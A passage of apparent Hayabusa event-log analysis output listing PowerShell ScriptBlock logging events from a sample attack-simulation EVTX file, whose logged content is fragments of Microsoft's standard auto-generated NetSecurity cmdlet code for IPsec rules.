(@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue)",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"$__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Rename-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryp",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"toSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 